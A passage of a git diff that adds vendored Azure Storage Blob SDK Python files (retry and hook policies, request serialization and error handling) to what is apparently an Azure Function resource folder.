+class StorageRequestHook(SansIOHTTPPolicy): + + def __init__(self, **kwargs): # pylint: disable=unused-argument + self._request_callback = kwargs.get('raw_request_hook') + super(StorageRequestHook, self).__init__() + + def on_request(self, request): + # type: (PipelineRequest, **Any) -> PipelineResponse + request_callback = request.context.options.pop('raw_request_hook', self._request_callback) + if request_callback: + request_callback(request) + + +class StorageResponseHook(HTTPPolicy): + + def __init__(self, **kwargs): # pylint: disable=unused-argument + self._response_callback = kwargs.get('raw_response_hook') + super(StorageResponseHook, self).__init__() + + def send(self, request): + # type: (PipelineRequest) -> PipelineResponse + # Values could be 0 + data_stream_total = request.context.get('data_stream_total') + if data_stream_total is None: + data_stream_total = request.context.options.pop('data_stream_total', None) + download_stream_current = request.context.get('download_stream_current') + if download_stream_current is None: + download_stream_current = request.context.options.pop('download_stream_current', None) + upload_stream_current = request.context.get('upload_stream_current') + if upload_stream_current is None: + upload_stream_current = request.context.options.pop('upload_stream_current', None) + + response_callback = request.context.get('response_callback') or \ + request.context.options.pop('raw_response_hook', self._response_callback) + + response = self.next.send(request) + + will_retry = is_retry(response, request.context.options.get('mode')) + # Auth error could come from Bearer challenge, in which case this request will be made again + is_auth_error = response.http_response.status_code == 401 + should_update_counts = not (will_retry or is_auth_error) + + if should_update_counts and download_stream_current is not None: + download_stream_current += int(response.http_response.headers.get('Content-Length', 0)) + if data_stream_total is None: + content_range = response.http_response.headers.get('Content-Range') + if content_range: + data_stream_total = int(content_range.split(' ', 1)[1].split('/', 1)[1]) + else: + data_stream_total = download_stream_current + elif should_update_counts and upload_stream_current is not None: + upload_stream_current += int(response.http_request.headers.get('Content-Length', 0)) + for pipeline_obj in [request, response]: + pipeline_obj.context['data_stream_total'] = data_stream_total + pipeline_obj.context['download_stream_current'] = download_stream_current + pipeline_obj.context['upload_stream_current'] = upload_stream_current + if response_callback: + response_callback(response) + request.context['response_callback'] = response_callback + return response + + +class StorageContentValidation(SansIOHTTPPolicy): + """A simple policy that sends the given headers + with the request. + + This will overwrite any headers already defined in the request. + """ + header_name = 'Content-MD5' + + def __init__(self, **kwargs): # pylint: disable=unused-argument + super(StorageContentValidation, self).__init__() + + @staticmethod + def get_content_md5(data): + md5 = hashlib.md5() # nosec + if isinstance(data, bytes): + md5.update(data) + elif hasattr(data, 'read'): + pos = 0 + try: + pos = data.tell() + except: # pylint: disable=bare-except + pass + for chunk in iter(lambda: data.read(4096), b""): + md5.update(chunk) + try: + data.seek(pos, SEEK_SET) + except (AttributeError, IOError): + raise ValueError("Data should be bytes or a seekable file-like object.") + else: + raise ValueError("Data should be bytes or a seekable file-like object.") + + return md5.digest() + + def on_request(self, request): + # type: (PipelineRequest, Any) -> None + validate_content = request.context.options.pop('validate_content', False) + if validate_content and request.http_request.method != 'GET': + computed_md5 = encode_base64(StorageContentValidation.get_content_md5(request.http_request.data)) + request.http_request.headers[self.header_name] = computed_md5 + request.context['validate_content_md5'] = computed_md5 + request.context['validate_content'] = validate_content + + def on_response(self, request, response): + if response.context.get('validate_content', False) and response.http_response.headers.get('content-md5'): + computed_md5 = request.context.get('validate_content_md5') or \ + encode_base64(StorageContentValidation.get_content_md5(response.http_response.body())) + if response.http_response.headers['content-md5'] != computed_md5: + raise AzureError( + 'MD5 mismatch. Expected value is \'{0}\', computed value is \'{1}\'.'.format( + response.http_response.headers['content-md5'], computed_md5), + response=response.http_response + ) + + +class StorageRetryPolicy(HTTPPolicy): + """ + The base class for Exponential and Linear retries containing shared code. + """ + + def __init__(self, **kwargs): + self.total_retries = kwargs.pop('retry_total', 10) + self.connect_retries = kwargs.pop('retry_connect', 3) + self.read_retries = kwargs.pop('retry_read', 3) + self.status_retries = kwargs.pop('retry_status', 3) + self.retry_to_secondary = kwargs.pop('retry_to_secondary', False) + super(StorageRetryPolicy, self).__init__() + + def _set_next_host_location(self, settings, request): # pylint: disable=no-self-use + """ + A function which sets the next host location on the request, if applicable. + + :param ~azure.storage.models.RetryContext context: + The retry context containing the previous host location and the request + to evaluate and possibly modify. + """ + if settings['hosts'] and all(settings['hosts'].values()): + url = urlparse(request.url) + # If there's more than one possible location, retry to the alternative + if settings['mode'] == LocationMode.PRIMARY: + settings['mode'] = LocationMode.SECONDARY + else: + settings['mode'] = LocationMode.PRIMARY + updated = url._replace(netloc=settings['hosts'].get(settings['mode'])) + request.url = updated.geturl() + + def configure_retries(self, request): # pylint: disable=no-self-use + body_position = None + if hasattr(request.http_request.body, 'read'): + try: + body_position = request.http_request.body.tell() + except (AttributeError, UnsupportedOperation): + # if body position cannot be obtained, then retries will not work + pass + options = request.context.options + return { + 'total': options.pop("retry_total", self.total_retries), + 'connect': options.pop("retry_connect", self.connect_retries), + 'read': options.pop("retry_read", self.read_retries), + 'status': options.pop("retry_status", self.status_retries), + 'retry_secondary': options.pop("retry_to_secondary", self.retry_to_secondary), + 'mode': options.pop("location_mode", LocationMode.PRIMARY), + 'hosts': options.pop("hosts", None), + 'hook': options.pop("retry_hook", None), + 'body_position': body_position, + 'count': 0, + 'history': [] + } + + def get_backoff_time(self, settings): # pylint: disable=unused-argument,no-self-use + """ Formula for computing the current backoff. + Should be calculated by child class. + + :rtype: float + """ + return 0 + + def sleep(self, settings, transport): + backoff = self.get_backoff_time(settings) + if not backoff or backoff < 0: + return + transport.sleep(backoff) + + def increment(self, settings, request, response=None, error=None): + """Increment the retry counters. + + :param response: A pipeline response object. + :param error: An error encountered during the request, or + None if the response was received successfully. + + :return: Whether the retry attempts are exhausted. + """ + settings['total'] -= 1 + + if error and isinstance(error, ServiceRequestError): + # Errors when we're fairly sure that the server did not receive the + # request, so it should be safe to retry. + settings['connect'] -= 1 + settings['history'].append(RequestHistory(request, error=error)) + + elif error and isinstance(error, ServiceResponseError): + # Errors that occur after the request has been started, so we should + # assume that the server began processing it. + settings['read'] -= 1 + settings['history'].append(RequestHistory(request, error=error)) + + else: + # Incrementing because of a server error like a 500 in + # status_forcelist and a the given method is in the allowlist + if response: + settings['status'] -= 1 + settings['history'].append(RequestHistory(request, http_response=response)) + + if not is_exhausted(settings): + if request.method not in ['PUT'] and settings['retry_secondary']: + self._set_next_host_location(settings, request) + + # rewind the request body if it is a stream + if request.body and hasattr(request.body, 'read'): + # no position was saved, then retry would not work + if settings['body_position'] is None: + return False + try: + # attempt to rewind the body to the initial position + request.body.seek(settings['body_position'], SEEK_SET) + except (UnsupportedOperation, ValueError): + # if body is not seekable, then retry would not work + return False + settings['count'] += 1 + return True + return False + + def send(self, request): + retries_remaining = True + response = None + retry_settings = self.configure_retries(request) + while retries_remaining: + try: + response = self.next.send(request) + if is_retry(response, retry_settings['mode']): + retries_remaining = self.increment( + retry_settings, + request=request.http_request, + response=response.http_response) + if retries_remaining: + retry_hook( + retry_settings, + request=request.http_request, + response=response.http_response, + error=None) + self.sleep(retry_settings, request.context.transport) + continue + break + except AzureError as err: + retries_remaining = self.increment( + retry_settings, request=request.http_request, error=err) + if retries_remaining: + retry_hook( + retry_settings, + request=request.http_request, + response=None, + error=err) + self.sleep(retry_settings, request.context.transport) + continue + raise err + if retry_settings['history']: + response.context['history'] = retry_settings['history'] + response.http_response.location_mode = retry_settings['mode'] + return response + + +class ExponentialRetry(StorageRetryPolicy): + """Exponential retry.""" + + def __init__(self, initial_backoff=15, increment_base=3, retry_total=3, + retry_to_secondary=False, random_jitter_range=3, **kwargs): + ''' + Constructs an Exponential retry object. The initial_backoff is used for + the first retry. Subsequent retries are retried after initial_backoff + + increment_power^retry_count seconds. + + :param int initial_backoff: + The initial backoff interval, in seconds, for the first retry. + :param int increment_base: + The base, in seconds, to increment the initial_backoff by after the + first retry. + :param int max_attempts: + The maximum number of retry attempts. + :param bool retry_to_secondary: + Whether the request should be retried to secondary, if able. This should + only be enabled of RA-GRS accounts are used and potentially stale data + can be handled. + :param int random_jitter_range: + A number in seconds which indicates a range to jitter/randomize for the back-off interval. + For example, a random_jitter_range of 3 results in the back-off interval x to vary between x+3 and x-3. + ''' + self.initial_backoff = initial_backoff + self.increment_base = increment_base + self.random_jitter_range = random_jitter_range + super(ExponentialRetry, self).__init__( + retry_total=retry_total, retry_to_secondary=retry_to_secondary, **kwargs) + + def get_backoff_time(self, settings): + """ + Calculates how long to sleep before retrying. + + :return: + An integer indicating how long to wait before retrying the request, + or None to indicate no retry should be performed. + :rtype: int or None + """ + random_generator = random.Random() + backoff = self.initial_backoff + (0 if settings['count'] == 0 else pow(self.increment_base, settings['count'])) + random_range_start = backoff - self.random_jitter_range if backoff > self.random_jitter_range else 0 + random_range_end = backoff + self.random_jitter_range + return random_generator.uniform(random_range_start, random_range_end) + + +class LinearRetry(StorageRetryPolicy): + """Linear retry.""" + + def __init__(self, backoff=15, retry_total=3, retry_to_secondary=False, random_jitter_range=3, **kwargs): + """ + Constructs a Linear retry object. + + :param int backoff: + The backoff interval, in seconds, between retries. + :param int max_attempts: + The maximum number of retry attempts. + :param bool retry_to_secondary: + Whether the request should be retried to secondary, if able. This should + only be enabled of RA-GRS accounts are used and potentially stale data + can be handled. + :param int random_jitter_range: + A number in seconds which indicates a range to jitter/randomize for the back-off interval. + For example, a random_jitter_range of 3 results in the back-off interval x to vary between x+3 and x-3. + """ + self.backoff = backoff + self.random_jitter_range = random_jitter_range + super(LinearRetry, self).__init__( + retry_total=retry_total, retry_to_secondary=retry_to_secondary, **kwargs) + + def get_backoff_time(self, settings): + """ + Calculates how long to sleep before retrying. + + :return: + An integer indicating how long to wait before retrying the request, + or None to indicate no retry should be performed. + :rtype: int or None + """ + random_generator = random.Random() + # the backoff interval normally does not change, however there is the possibility + # that it was modified by accessing the property directly after initializing the object + random_range_start = self.backoff - self.random_jitter_range \ + if self.backoff > self.random_jitter_range else 0 + random_range_end = self.backoff + self.random_jitter_range + return random_generator.uniform(random_range_start, random_range_end) + + +class StorageBearerTokenCredentialPolicy(BearerTokenCredentialPolicy): + """ Custom Bearer token credential policy for following Storage Bearer challenges """ + + def __init__(self, credential, **kwargs): + # type: (TokenCredential, **Any) -> None + super(StorageBearerTokenCredentialPolicy, self).__init__(credential, STORAGE_OAUTH_SCOPE, **kwargs) + + def on_challenge(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> bool + try: + auth_header = response.http_response.headers.get("WWW-Authenticate") + challenge = StorageHttpChallenge(auth_header) + except ValueError: + return False + + scope = challenge.resource_id + DEFAULT_OAUTH_SCOPE + self.authorize_request(request, scope, tenant_id=challenge.tenant_id) + + return True diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/policies_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/policies_async.py new file mode 100644 index 0000000..fb957e9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/policies_async.py @@ -0,0 +1,253 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=invalid-overridden-method + +import asyncio +import random +import logging +from typing import Any, TYPE_CHECKING + +from azure.core.pipeline.policies import AsyncBearerTokenCredentialPolicy, AsyncHTTPPolicy +from azure.core.exceptions import AzureError + +from .authentication import StorageHttpChallenge +from .constants import DEFAULT_OAUTH_SCOPE, STORAGE_OAUTH_SCOPE +from .policies import is_retry, StorageRetryPolicy + +if TYPE_CHECKING: + from azure.core.credentials_async import AsyncTokenCredential + from azure.core.pipeline import PipelineRequest, PipelineResponse + + +_LOGGER = logging.getLogger(__name__) + + +async def retry_hook(settings, **kwargs): + if settings['hook']: + if asyncio.iscoroutine(settings['hook']): + await settings['hook']( + retry_count=settings['count'] - 1, + location_mode=settings['mode'], + **kwargs) + else: + settings['hook']( + retry_count=settings['count'] - 1, + location_mode=settings['mode'], + **kwargs) + + +class AsyncStorageResponseHook(AsyncHTTPPolicy): + + def __init__(self, **kwargs): # pylint: disable=unused-argument + self._response_callback = kwargs.get('raw_response_hook') + super(AsyncStorageResponseHook, self).__init__() + + async def send(self, request): + # type: (PipelineRequest) -> PipelineResponse + # Values could be 0 + data_stream_total = request.context.get('data_stream_total') + if data_stream_total is None: + data_stream_total = request.context.options.pop('data_stream_total', None) + download_stream_current = request.context.get('download_stream_current') + if download_stream_current is None: + download_stream_current = request.context.options.pop('download_stream_current', None) + upload_stream_current = request.context.get('upload_stream_current') + if upload_stream_current is None: + upload_stream_current = request.context.options.pop('upload_stream_current', None) + + response_callback = request.context.get('response_callback') or \ + request.context.options.pop('raw_response_hook', self._response_callback) + + response = await self.next.send(request) + await response.http_response.load_body() + + will_retry = is_retry(response, request.context.options.get('mode')) + # Auth error could come from Bearer challenge, in which case this request will be made again + is_auth_error = response.http_response.status_code == 401 + should_update_counts = not (will_retry or is_auth_error) + + if should_update_counts and download_stream_current is not None: + download_stream_current += int(response.http_response.headers.get('Content-Length', 0)) + if data_stream_total is None: + content_range = response.http_response.headers.get('Content-Range') + if content_range: + data_stream_total = int(content_range.split(' ', 1)[1].split('/', 1)[1]) + else: + data_stream_total = download_stream_current + elif should_update_counts and upload_stream_current is not None: + upload_stream_current += int(response.http_request.headers.get('Content-Length', 0)) + for pipeline_obj in [request, response]: + pipeline_obj.context['data_stream_total'] = data_stream_total + pipeline_obj.context['download_stream_current'] = download_stream_current + pipeline_obj.context['upload_stream_current'] = upload_stream_current + if response_callback: + if asyncio.iscoroutine(response_callback): + await response_callback(response) + else: + response_callback(response) + request.context['response_callback'] = response_callback + return response + +class AsyncStorageRetryPolicy(StorageRetryPolicy): + """ + The base class for Exponential and Linear retries containing shared code. + """ + + async def sleep(self, settings, transport): + backoff = self.get_backoff_time(settings) + if not backoff or backoff < 0: + return + await transport.sleep(backoff) + + async def send(self, request): + retries_remaining = True + response = None + retry_settings = self.configure_retries(request) + while retries_remaining: + try: + response = await self.next.send(request) + if is_retry(response, retry_settings['mode']): + retries_remaining = self.increment( + retry_settings, + request=request.http_request, + response=response.http_response) + if retries_remaining: + await retry_hook( + retry_settings, + request=request.http_request, + response=response.http_response, + error=None) + await self.sleep(retry_settings, request.context.transport) + continue + break + except AzureError as err: + retries_remaining = self.increment( + retry_settings, request=request.http_request, error=err) + if retries_remaining: + await retry_hook( + retry_settings, + request=request.http_request, + response=None, + error=err) + await self.sleep(retry_settings, request.context.transport) + continue + raise err + if retry_settings['history']: + response.context['history'] = retry_settings['history'] + response.http_response.location_mode = retry_settings['mode'] + return response + + +class ExponentialRetry(AsyncStorageRetryPolicy): + """Exponential retry.""" + + def __init__(self, initial_backoff=15, increment_base=3, retry_total=3, + retry_to_secondary=False, random_jitter_range=3, **kwargs): + ''' + Constructs an Exponential retry object. The initial_backoff is used for + the first retry. Subsequent retries are retried after initial_backoff + + increment_power^retry_count seconds. For example, by default the first retry + occurs after 15 seconds, the second after (15+3^1) = 18 seconds, and the + third after (15+3^2) = 24 seconds. + + :param int initial_backoff: + The initial backoff interval, in seconds, for the first retry. + :param int increment_base: + The base, in seconds, to increment the initial_backoff by after the + first retry. + :param int max_attempts: + The maximum number of retry attempts. + :param bool retry_to_secondary: + Whether the request should be retried to secondary, if able. This should + only be enabled of RA-GRS accounts are used and potentially stale data + can be handled. + :param int random_jitter_range: + A number in seconds which indicates a range to jitter/randomize for the back-off interval. + For example, a random_jitter_range of 3 results in the back-off interval x to vary between x+3 and x-3. + ''' + self.initial_backoff = initial_backoff + self.increment_base = increment_base + self.random_jitter_range = random_jitter_range + super(ExponentialRetry, self).__init__( + retry_total=retry_total, retry_to_secondary=retry_to_secondary, **kwargs) + + def get_backoff_time(self, settings): + """ + Calculates how long to sleep before retrying. + + :return: + An integer indicating how long to wait before retrying the request, + or None to indicate no retry should be performed. + :rtype: int or None + """ + random_generator = random.Random() + backoff = self.initial_backoff + (0 if settings['count'] == 0 else pow(self.increment_base, settings['count'])) + random_range_start = backoff - self.random_jitter_range if backoff > self.random_jitter_range else 0 + random_range_end = backoff + self.random_jitter_range + return random_generator.uniform(random_range_start, random_range_end) + + +class LinearRetry(AsyncStorageRetryPolicy): + """Linear retry.""" + + def __init__(self, backoff=15, retry_total=3, retry_to_secondary=False, random_jitter_range=3, **kwargs): + """ + Constructs a Linear retry object. + + :param int backoff: + The backoff interval, in seconds, between retries. + :param int max_attempts: + The maximum number of retry attempts. + :param bool retry_to_secondary: + Whether the request should be retried to secondary, if able. This should + only be enabled of RA-GRS accounts are used and potentially stale data + can be handled. + :param int random_jitter_range: + A number in seconds which indicates a range to jitter/randomize for the back-off interval. + For example, a random_jitter_range of 3 results in the back-off interval x to vary between x+3 and x-3. + """ + self.backoff = backoff + self.random_jitter_range = random_jitter_range + super(LinearRetry, self).__init__( + retry_total=retry_total, retry_to_secondary=retry_to_secondary, **kwargs) + + def get_backoff_time(self, settings): + """ + Calculates how long to sleep before retrying. + + :return: + An integer indicating how long to wait before retrying the request, + or None to indicate no retry should be performed. + :rtype: int or None + """ + random_generator = random.Random() + # the backoff interval normally does not change, however there is the possibility + # that it was modified by accessing the property directly after initializing the object + random_range_start = self.backoff - self.random_jitter_range \ + if self.backoff > self.random_jitter_range else 0 + random_range_end = self.backoff + self.random_jitter_range + return random_generator.uniform(random_range_start, random_range_end) + + +class AsyncStorageBearerTokenCredentialPolicy(AsyncBearerTokenCredentialPolicy): + """ Custom Bearer token credential policy for following Storage Bearer challenges """ + + def __init__(self, credential, **kwargs): + # type: (AsyncTokenCredential, **Any) -> None + super(AsyncStorageBearerTokenCredentialPolicy, self).__init__(credential, STORAGE_OAUTH_SCOPE, **kwargs) + + async def on_challenge(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> bool + try: + auth_header = response.http_response.headers.get("WWW-Authenticate") + challenge = StorageHttpChallenge(auth_header) + except ValueError: + return False + + scope = challenge.resource_id + DEFAULT_OAUTH_SCOPE + await self.authorize_request(request, scope, tenant_id=challenge.tenant_id) + + return True diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/request_handlers.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/request_handlers.py new file mode 100644 index 0000000..4ff4539 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/request_handlers.py @@ -0,0 +1,278 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, Iterable, Dict, List, Type, Tuple, + TYPE_CHECKING +) + +import logging +from os import fstat +import stat +from io import (SEEK_END, SEEK_SET, UnsupportedOperation) + +import isodate + +from azure.core.exceptions import raise_with_traceback + + +_LOGGER = logging.getLogger(__name__) + +_REQUEST_DELIMITER_PREFIX = "batch_" +_HTTP1_1_IDENTIFIER = "HTTP/1.1" +_HTTP_LINE_ENDING = "\r\n" + + +def serialize_iso(attr): + """Serialize Datetime object into ISO-8601 formatted string. + + :param Datetime attr: Object to be serialized. + :rtype: str + :raises: ValueError if format invalid. + """ + if not attr: + return None + if isinstance(attr, str): + attr = isodate.parse_datetime(attr) + try: + utc = attr.utctimetuple() + if utc.tm_year > 9999 or utc.tm_year < 1: + raise OverflowError("Hit max or min date") + + date = "{:04}-{:02}-{:02}T{:02}:{:02}:{:02}".format( + utc.tm_year, utc.tm_mon, utc.tm_mday, + utc.tm_hour, utc.tm_min, utc.tm_sec) + return date + 'Z' + except (ValueError, OverflowError) as err: + msg = "Unable to serialize datetime object." + raise_with_traceback(ValueError, msg, err) + except AttributeError as err: + msg = "ISO-8601 object must be valid Datetime object." + raise_with_traceback(TypeError, msg, err) + + +def get_length(data): + length = None + # Check if object implements the __len__ method, covers most input cases such as bytearray. + try: + length = len(data) + except: # pylint: disable=bare-except + pass + + if not length: + # Check if the stream is a file-like stream object. + # If so, calculate the size using the file descriptor. + try: + fileno = data.fileno() + except (AttributeError, UnsupportedOperation): + pass + else: + try: + mode = fstat(fileno).st_mode + if stat.S_ISREG(mode) or stat.S_ISLNK(mode): + #st_size only meaningful if regular file or symlink, other types + # e.g. sockets may return misleading sizes like 0 + return fstat(fileno).st_size + except OSError: + # Not a valid fileno, may be possible requests returned + # a socket number? + pass + + # If the stream is seekable and tell() is implemented, calculate the stream size. + try: + current_position = data.tell() + data.seek(0, SEEK_END) + length = data.tell() - current_position + data.seek(current_position, SEEK_SET) + except (AttributeError, OSError, UnsupportedOperation): + pass + + return length + + +def read_length(data): + try: + if hasattr(data, 'read'): + read_data = b'' + for chunk in iter(lambda: data.read(4096), b""): + read_data += chunk + return len(read_data), read_data + if hasattr(data, '__iter__'): + read_data = b'' + for chunk in data: + read_data += chunk + return len(read_data), read_data + except: # pylint: disable=bare-except + pass + raise ValueError("Unable to calculate content length, please specify.") + + +def validate_and_format_range_headers( + start_range, end_range, start_range_required=True, + end_range_required=True, check_content_md5=False, align_to_page=False): + # If end range is provided, start range must be provided + if (start_range_required or end_range is not None) and start_range is None: + raise ValueError("start_range value cannot be None.") + if end_range_required and end_range is None: + raise ValueError("end_range value cannot be None.") + + # Page ranges must be 512 aligned + if align_to_page: + if start_range is not None and start_range % 512 != 0: + raise ValueError("Invalid page blob start_range: {0}. " + "The size must be aligned to a 512-byte boundary.".format(start_range)) + if end_range is not None and end_range % 512 != 511: + raise ValueError("Invalid page blob end_range: {0}. " + "The size must be aligned to a 512-byte boundary.".format(end_range)) + + # Format based on whether end_range is present + range_header = None + if end_range is not None: + range_header = 'bytes={0}-{1}'.format(start_range, end_range) + elif start_range is not None: + range_header = "bytes={0}-".format(start_range) + + # Content MD5 can only be provided for a complete range less than 4MB in size + range_validation = None + if check_content_md5: + if start_range is None or end_range is None: + raise ValueError("Both start and end range requied for MD5 content validation.") + if end_range - start_range > 4 * 1024 * 1024: + raise ValueError("Getting content MD5 for a range greater than 4MB is not supported.") + range_validation = 'true' + + return range_header, range_validation + + +def add_metadata_headers(metadata=None): + # type: (Optional[Dict[str, str]]) -> Dict[str, str] + headers = {} + if metadata: + for key, value in metadata.items(): + headers['x-ms-meta-{}'.format(key.strip())] = value.strip() if value else value + return headers + + +def serialize_batch_body(requests, batch_id): + """ + -- + + -- + (repeated as needed) + ---- + + Serializes the requests in this batch to a single HTTP mixed/multipart body. + + :param list[~azure.core.pipeline.transport.HttpRequest] requests: + a list of sub-request for the batch request + :param str batch_id: + to be embedded in batch sub-request delimiter + :return: The body bytes for this batch. + """ + + if requests is None or len(requests) == 0: + raise ValueError('Please provide sub-request(s) for this batch request') + + delimiter_bytes = (_get_batch_request_delimiter(batch_id, True, False) + _HTTP_LINE_ENDING).encode('utf-8') + newline_bytes = _HTTP_LINE_ENDING.encode('utf-8') + batch_body = list() + + content_index = 0 + for request in requests: + request.headers.update({ + "Content-ID": str(content_index), + "Content-Length": str(0) + }) + batch_body.append(delimiter_bytes) + batch_body.append(_make_body_from_sub_request(request)) + batch_body.append(newline_bytes) + content_index += 1 + + batch_body.append(_get_batch_request_delimiter(batch_id, True, True).encode('utf-8')) + # final line of body MUST have \r\n at the end, or it will not be properly read by the service + batch_body.append(newline_bytes) + + return bytes().join(batch_body) + + +def _get_batch_request_delimiter(batch_id, is_prepend_dashes=False, is_append_dashes=False): + """ + Gets the delimiter used for this batch request's mixed/multipart HTTP format. + + :param str batch_id: + Randomly generated id + :param bool is_prepend_dashes: + Whether to include the starting dashes. Used in the body, but non on defining the delimiter. + :param bool is_append_dashes: + Whether to include the ending dashes. Used in the body on the closing delimiter only. + :return: The delimiter, WITHOUT a trailing newline. + """ + + prepend_dashes = '--' if is_prepend_dashes else '' + append_dashes = '--' if is_append_dashes else '' + + return prepend_dashes + _REQUEST_DELIMITER_PREFIX + batch_id + append_dashes + + +def _make_body_from_sub_request(sub_request): + """ + Content-Type: application/http + Content-ID: + Content-Transfer-Encoding: (if present) + + HTTP/ +
:
(repeated as necessary) + Content-Length: + (newline if content length > 0) + (if content length > 0) + + Serializes an http request. + + :param ~azure.core.pipeline.transport.HttpRequest sub_request: + Request to serialize. + :return: The serialized sub-request in bytes + """ + + # put the sub-request's headers into a list for efficient str concatenation + sub_request_body = list() + + # get headers for ease of manipulation; remove headers as they are used + headers = sub_request.headers + + # append opening headers + sub_request_body.append("Content-Type: application/http") + sub_request_body.append(_HTTP_LINE_ENDING) + + sub_request_body.append("Content-ID: ") + sub_request_body.append(headers.pop("Content-ID", "")) + sub_request_body.append(_HTTP_LINE_ENDING) + + sub_request_body.append("Content-Transfer-Encoding: binary") + sub_request_body.append(_HTTP_LINE_ENDING) + + # append blank line + sub_request_body.append(_HTTP_LINE_ENDING) + + # append HTTP verb and path and query and HTTP version + sub_request_body.append(sub_request.method) + sub_request_body.append(' ') + sub_request_body.append(sub_request.url) + sub_request_body.append(' ') + sub_request_body.append(_HTTP1_1_IDENTIFIER) + sub_request_body.append(_HTTP_LINE_ENDING) + + # append remaining headers (this will set the Content-Length, as it was set on `sub-request`) + for header_name, header_value in headers.items(): + if header_value is not None: + sub_request_body.append(header_name) + sub_request_body.append(": ") + sub_request_body.append(header_value) + sub_request_body.append(_HTTP_LINE_ENDING) + + # append blank line + sub_request_body.append(_HTTP_LINE_ENDING) + + return ''.join(sub_request_body).encode() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/response_handlers.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/response_handlers.py new file mode 100644 index 0000000..570e82e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/response_handlers.py @@ -0,0 +1,195 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, Iterable, Dict, List, Type, Tuple, + TYPE_CHECKING +) +import logging +from xml.etree.ElementTree import Element + +from azure.core.pipeline.policies import ContentDecodePolicy +from azure.core.exceptions import ( + HttpResponseError, + ResourceNotFoundError, + ResourceModifiedError, + ResourceExistsError, + ClientAuthenticationError, + DecodeError) + +from .parser import _to_utc_datetime +from .models import StorageErrorCode, UserDelegationKey, get_enum_value + +if TYPE_CHECKING: + from datetime import datetime + from azure.core.exceptions import AzureError + + +_LOGGER = logging.getLogger(__name__) + + +class PartialBatchErrorException(HttpResponseError): + """There is a partial failure in batch operations. + + :param str message: The message of the exception. + :param response: Server response to be deserialized. + :param list parts: A list of the parts in multipart response. + """ + + def __init__(self, message, response, parts): + self.parts = parts + super(PartialBatchErrorException, self).__init__(message=message, response=response) + + +def parse_length_from_content_range(content_range): + ''' + Parses the blob length from the content range header: bytes 1-3/65537 + ''' + if content_range is None: + return None + + # First, split in space and take the second half: '1-3/65537' + # Next, split on slash and take the second half: '65537' + # Finally, convert to an int: 65537 + return int(content_range.split(' ', 1)[1].split('/', 1)[1]) + + +def normalize_headers(headers): + normalized = {} + for key, value in headers.items(): + if key.startswith('x-ms-'): + key = key[5:] + normalized[key.lower().replace('-', '_')] = get_enum_value(value) + return normalized + + +def deserialize_metadata(response, obj, headers): # pylint: disable=unused-argument + raw_metadata = {k: v for k, v in response.http_response.headers.items() if k.startswith("x-ms-meta-")} + return {k[10:]: v for k, v in raw_metadata.items()} + + +def return_response_headers(response, deserialized, response_headers): # pylint: disable=unused-argument + return normalize_headers(response_headers) + + +def return_headers_and_deserialized(response, deserialized, response_headers): # pylint: disable=unused-argument + return normalize_headers(response_headers), deserialized + + +def return_context_and_deserialized(response, deserialized, response_headers): # pylint: disable=unused-argument + return response.http_response.location_mode, deserialized + + +def process_storage_error(storage_error): # pylint:disable=too-many-statements + raise_error = HttpResponseError + serialized = False + if not storage_error.response: + raise storage_error + # If it is one of those three then it has been serialized prior by the generated layer. + if isinstance(storage_error, (PartialBatchErrorException, + ClientAuthenticationError, ResourceNotFoundError, ResourceExistsError)): + serialized = True + error_code = storage_error.response.headers.get('x-ms-error-code') + error_message = storage_error.message + additional_data = {} + error_dict = {} + try: + error_body = ContentDecodePolicy.deserialize_from_http_generics(storage_error.response) + try: + error_body = error_body or storage_error.response.reason + except AttributeError: + error_body = '' + # If it is an XML response + if isinstance(error_body, Element): + error_dict = { + child.tag.lower(): child.text + for child in error_body + } + # If it is a JSON response + elif isinstance(error_body, dict): + error_dict = error_body.get('error', {}) + elif not error_code: + _LOGGER.warning( + 'Unexpected return type %s from ContentDecodePolicy.deserialize_from_http_generics.', type(error_body)) + error_dict = {'message': str(error_body)} + + # If we extracted from a Json or XML response + if error_dict: + error_code = error_dict.get('code') + error_message = error_dict.get('message') + additional_data = {k: v for k, v in error_dict.items() if k not in {'code', 'message'}} + except DecodeError: + pass + + try: + # This check would be unnecessary if we have already serialized the error + if error_code and not serialized: + error_code = StorageErrorCode(error_code) + if error_code in [StorageErrorCode.condition_not_met, + StorageErrorCode.blob_overwritten]: + raise_error = ResourceModifiedError + if error_code in [StorageErrorCode.invalid_authentication_info, + StorageErrorCode.authentication_failed]: + raise_error = ClientAuthenticationError + if error_code in [StorageErrorCode.resource_not_found, + StorageErrorCode.cannot_verify_copy_source, + StorageErrorCode.blob_not_found, + StorageErrorCode.queue_not_found, + StorageErrorCode.container_not_found, + StorageErrorCode.parent_not_found, + StorageErrorCode.share_not_found]: + raise_error = ResourceNotFoundError + if error_code in [StorageErrorCode.account_already_exists, + StorageErrorCode.account_being_created, + StorageErrorCode.resource_already_exists, + StorageErrorCode.resource_type_mismatch, + StorageErrorCode.blob_already_exists, + StorageErrorCode.queue_already_exists, + StorageErrorCode.container_already_exists, 